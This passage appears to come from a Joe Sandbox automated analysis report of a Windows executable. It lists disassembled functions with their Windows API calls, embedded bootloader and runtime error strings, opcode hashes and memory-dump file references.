                                                                                                                                                                                                  • API String ID: 1662231829-930877121
                                                                                                                                                                                                  • Opcode ID: 9eab8ee9825a9fbd44869a095635737d99e10a8ea38952c2113d32bd4c9397e1
                                                                                                                                                                                                  • Instruction ID: 4fc551f03afe220fa508810956e2b5b4509088c4f11bfb10f8e9aaa6f5827366
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9eab8ee9825a9fbd44869a095635737d99e10a8ea38952c2113d32bd4c9397e1
                                                                                                                                                                                                  • Instruction Fuzzy Hash: C041B421A3CE4381FA51BB24EA552BAEA61BF947A0FC45031D64E52795EE3CF50C8730
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1554204786.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554173267.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554242811.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF710304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554355220.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                                                                                                                                                                  • String ID: P%
                                                                                                                                                                                                  • API String ID: 2147705588-2959514604
                                                                                                                                                                                                  • Opcode ID: d5dd136cfe9f7ccbcb0fe4cae99cf14dfe1cc9f89db7d8019ba122c6a34f6d98
                                                                                                                                                                                                  • Instruction ID: 2515e3242082aed70463a4dedcb934d744a6b3f25cd045521c73e843645ee31c
                                                                                                                                                                                                  • Opcode Fuzzy Hash: d5dd136cfe9f7ccbcb0fe4cae99cf14dfe1cc9f89db7d8019ba122c6a34f6d98
                                                                                                                                                                                                  • Instruction Fuzzy Hash: C9510726614BA186D6259F26F4181BBFBA1F798B61F404121EBCE43785DF3CE049DB20
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1554204786.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554173267.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554242811.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF710304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554355220.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                  • String ID: -$:$f$p$p
                                                                                                                                                                                                  • API String ID: 3215553584-2013873522
                                                                                                                                                                                                  • Opcode ID: 21cbc72c7e6dc269be11e21f83bf2085e3383c5e1ad4ae35147280bf7774980f
                                                                                                                                                                                                  • Instruction ID: fa29aaffd89cfebb3faf078bedcff510c0b0bf7f27e9d90005ced907e047f879
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 21cbc72c7e6dc269be11e21f83bf2085e3383c5e1ad4ae35147280bf7774980f
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1712A223A0CAA386FB20BA15D0542B9FA51FB40774FD44136E699467C4DFBCFD888B64
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1554204786.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554173267.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554242811.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF710304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554355220.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                  • String ID: f$f$p$p$f
                                                                                                                                                                                                  • API String ID: 3215553584-1325933183
                                                                                                                                                                                                  • Opcode ID: 1ce7302e2fd45bb0c0c54093c0ec2c5d292275181cf657796836d36714c503ba
                                                                                                                                                                                                  • Instruction ID: c7108147193213be7047729e535db6d711e21f6fce37f56f216e38a4a6e993c5
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1ce7302e2fd45bb0c0c54093c0ec2c5d292275181cf657796836d36714c503ba
                                                                                                                                                                                                  • Instruction Fuzzy Hash: BC129263E0C94386FB20BA15E0947B9EA51FB807A4FD44031F689467E4DB7DFC889B64
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1554204786.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554173267.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554242811.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF710304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554355220.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Message
                                                                                                                                                                                                  • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                  • API String ID: 2030045667-3659356012
                                                                                                                                                                                                  • Opcode ID: 5fbb37684b934dd840098da71c76c69d6c632a09fb4735c5c5b6d8934ed646c0
                                                                                                                                                                                                  • Instruction ID: 0c014dd05e9e100d9cc49e8df0cdf85d50e91f5337c1f7f898066be17bcf59a7
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5fbb37684b934dd840098da71c76c69d6c632a09fb4735c5c5b6d8934ed646c0
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5441B221B18E4342FA14BB12AA416B6EB91BF46BE4FD84031DE0D07B95DE7CF44D8760
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1554204786.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554173267.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554242811.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF710304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554355220.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Message
                                                                                                                                                                                                  • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                  • API String ID: 2030045667-3659356012
                                                                                                                                                                                                  • Opcode ID: 982cd2b96996f0ecb3dcf09ee6fd1ebe83e48620aff4e51a16cded83b03020f8
                                                                                                                                                                                                  • Instruction ID: 1e80b0dc757a02401dcb4ba824b1a6a7c3a3cdc8484b327db10704f9629a8bf5
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 982cd2b96996f0ecb3dcf09ee6fd1ebe83e48620aff4e51a16cded83b03020f8
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9E41B022B18A4381EA21BB15AA415B6EBA0FF457E4FD44032DE4D17B95EE3CF4498720
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1554204786.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554173267.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554242811.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF710304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554355220.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                                  • String ID: csm$csm$csm
                                                                                                                                                                                                  • API String ID: 849930591-393685449
                                                                                                                                                                                                  • Opcode ID: 9e3578d2910a1de3a92e15cd58e24121979594cfb80c91fc1a566261b89881c5
                                                                                                                                                                                                  • Instruction ID: 431935d7e2acf15eedf4495fdeb90a30d818f9cb70417d1456e7679c28ab53ef
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9e3578d2910a1de3a92e15cd58e24121979594cfb80c91fc1a566261b89881c5
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 71D1C332A28F4186EB20AF24D5403ADBBA0FB457A8F540135EE4D57B9ACF38F499C750
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(?,?,?,00007FF7102CD29A,?,?,?,00007FF7102CCF8C,?,?,?,00007FF7102CCB89), ref: 00007FF7102CD06D
                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00007FF7102CD29A,?,?,?,00007FF7102CCF8C,?,?,?,00007FF7102CCB89), ref: 00007FF7102CD07B
                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(?,?,?,00007FF7102CD29A,?,?,?,00007FF7102CCF8C,?,?,?,00007FF7102CCB89), ref: 00007FF7102CD0A5
                                                                                                                                                                                                  • FreeLibrary.KERNEL32(?,?,?,00007FF7102CD29A,?,?,?,00007FF7102CCF8C,?,?,?,00007FF7102CCB89), ref: 00007FF7102CD113
                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,?,?,00007FF7102CD29A,?,?,?,00007FF7102CCF8C,?,?,?,00007FF7102CCB89), ref: 00007FF7102CD11F
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1554204786.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554173267.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554242811.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF710304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554355220.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                  • String ID: api-ms-
                                                                                                                                                                                                  • API String ID: 2559590344-2084034818
                                                                                                                                                                                                  • Opcode ID: ae36e00ef30d4e956021163d7a0c1bae911f6c658fcf96311cd3d9d96979b27c
                                                                                                                                                                                                  • Instruction ID: bc55b2914dc31ce8cbee4c269d15667b4e04859bdba50843209f068e3f4486c4
                                                                                                                                                                                                  • Opcode Fuzzy Hash: ae36e00ef30d4e956021163d7a0c1bae911f6c658fcf96311cd3d9d96979b27c
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2831A421A2AE4291EE12BB16A940675AB94BF45BB4F9A0535DD1D0B380EF3CF44A8320
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1554204786.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554173267.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554242811.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF710304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554355220.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Value$ErrorLast
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2506987500-0
                                                                                                                                                                                                  • Opcode ID: 67217a7fc91f5e25160bb9a3b2c8204a3bd01eab0ccbfeeabb81ecf6e12f005c
                                                                                                                                                                                                  • Instruction ID: 108f13621333e7c22e64139f4c076ac5a51fce8e50df9ef2037d7fcbc7ce2b24
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 67217a7fc91f5e25160bb9a3b2c8204a3bd01eab0ccbfeeabb81ecf6e12f005c
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 83214C22B0CE4242FAA57326565653EE9825F487B0FD44734E93E07BD6DE6CFC094721
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1554204786.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554173267.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554242811.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF710304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554355220.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                                                  • String ID: CONOUT$
                                                                                                                                                                                                  • API String ID: 3230265001-3130406586
                                                                                                                                                                                                  • Opcode ID: 274174309ff0e3cf7757a3f5c883333dff1858e51aae267b9afc88cc39a62d3b
                                                                                                                                                                                                  • Instruction ID: 0acf70eceb6296892ff7bf39ca9b479fd96fc484d89a55ea6fac557619474cd3
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 274174309ff0e3cf7757a3f5c883333dff1858e51aae267b9afc88cc39a62d3b
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6D11B921B18F4286E7519B02E85432AEAA0FB48FF4F800234EA1D57794DF7CF408C760
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(?,00000000,?,00007FF7102C39F2), ref: 00007FF7102C821D
                                                                                                                                                                                                  • K32EnumProcessModules.KERNEL32(?,00000000,?,00007FF7102C39F2), ref: 00007FF7102C827A
                                                                                                                                                                                                    • Part of subcall function 00007FF7102C86B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7102C3FA4,00000000,00007FF7102C1925), ref: 00007FF7102C86E9
                                                                                                                                                                                                  • K32GetModuleFileNameExW.KERNEL32(?,00000000,?,00007FF7102C39F2), ref: 00007FF7102C8305
                                                                                                                                                                                                  • K32GetModuleFileNameExW.KERNEL32(?,00000000,?,00007FF7102C39F2), ref: 00007FF7102C8364
                                                                                                                                                                                                  • FreeLibrary.KERNEL32(?,00000000,?,00007FF7102C39F2), ref: 00007FF7102C8375
                                                                                                                                                                                                  • FreeLibrary.KERNEL32(?,00000000,?,00007FF7102C39F2), ref: 00007FF7102C838A
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1554204786.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554173267.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554242811.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF710304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554355220.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3462794448-0
                                                                                                                                                                                                  • Opcode ID: 639de59220823cace7c77af6f37b7d772b01f3b75ea0781fa3cc2fa807537d27
                                                                                                                                                                                                  • Instruction ID: 31a49b861d1fb7d0be2e1656a41770f2dfc72d09d0950bcde8a7ba08e0bae8e0
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 639de59220823cace7c77af6f37b7d772b01f3b75ea0781fa3cc2fa807537d27
                                                                                                                                                                                                  • Instruction Fuzzy Hash: A341A362A29EC241EA30AB11A6002BABB94FF85BE4F845135DF5D57789DE7CF409C720
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00007FF7102D43FD,?,?,?,?,00007FF7102D979A,?,?,?,?,00007FF7102D649F), ref: 00007FF7102DA5E7
                                                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF7102D43FD,?,?,?,?,00007FF7102D979A,?,?,?,?,00007FF7102D649F), ref: 00007FF7102DA61D
                                                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF7102D43FD,?,?,?,?,00007FF7102D979A,?,?,?,?,00007FF7102D649F), ref: 00007FF7102DA64A
                                                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF7102D43FD,?,?,?,?,00007FF7102D979A,?,?,?,?,00007FF7102D649F), ref: 00007FF7102DA65B
                                                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF7102D43FD,?,?,?,?,00007FF7102D979A,?,?,?,?,00007FF7102D649F), ref: 00007FF7102DA66C
                                                                                                                                                                                                  • SetLastError.KERNEL32(?,?,?,00007FF7102D43FD,?,?,?,?,00007FF7102D979A,?,?,?,?,00007FF7102D649F), ref: 00007FF7102DA687
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1554204786.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554173267.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554242811.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF710304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554355220.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Value$ErrorLast
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2506987500-0
                                                                                                                                                                                                  • Opcode ID: ef20b32075126869ce53cf62fbcb139ef3f5263cb698c8c2b5617054fce20239
                                                                                                                                                                                                  • Instruction ID: f129e391c2801b7840431ed6c2a0e6c07870378c41cd302f2166c758de3b3d37
                                                                                                                                                                                                  • Opcode Fuzzy Hash: ef20b32075126869ce53cf62fbcb139ef3f5263cb698c8c2b5617054fce20239
                                                                                                                                                                                                  • Instruction Fuzzy Hash: C2116A22A0CE4286FEA57726964153EEA865F487B0FC84334E93E077D6DE2CFC094761
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1554204786.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554173267.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554242811.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF710304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554355220.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                                                                                                                                                                  • String ID: Unhandled exception in script
                                                                                                                                                                                                  • API String ID: 3081866767-2699770090
                                                                                                                                                                                                  • Opcode ID: 2f02a126994589ece2bf0b221661227d336c2ada993d2ff489732679099e34b6
                                                                                                                                                                                                  • Instruction ID: e16cd90828a7366839e8d8f019176bf37a2c8210f47ea8b77c3bc0a4953d490a
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2f02a126994589ece2bf0b221661227d336c2ada993d2ff489732679099e34b6
                                                                                                                                                                                                  • Instruction Fuzzy Hash: E9319572618E8289EB20EF61E8552FAB760FF897A4F840135EA4D47B55DF3CE508C710
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1554204786.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554173267.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554242811.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF710304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554355220.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Message$ByteCharMultiWide
                                                                                                                                                                                                  • String ID: %s%s: %s$Error$Error/warning (ANSI fallback)
                                                                                                                                                                                                  • API String ID: 1878133881-640379615
                                                                                                                                                                                                  • Opcode ID: c7e22cebafa3b4081381e7f20538df90bc3c47857982eb0ae5879fef5a553f49
                                                                                                                                                                                                  • Instruction ID: 49c044f1bbff69d25bf06c21e31068de913e7e039e2977579727c86632218760
                                                                                                                                                                                                  • Opcode Fuzzy Hash: c7e22cebafa3b4081381e7f20538df90bc3c47857982eb0ae5879fef5a553f49
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 51219672628E8681E620AB10F4517EAA764FF84794F801136E68C13B99CF7CE649C760
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1554204786.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554173267.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554242811.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF710304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554355220.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                  • API String ID: 4061214504-1276376045
                                                                                                                                                                                                  • Opcode ID: f1eb0c22b123c1cdb2873c61f44d146b1d21622817f8dd4d6a21f18b4a6e3d93
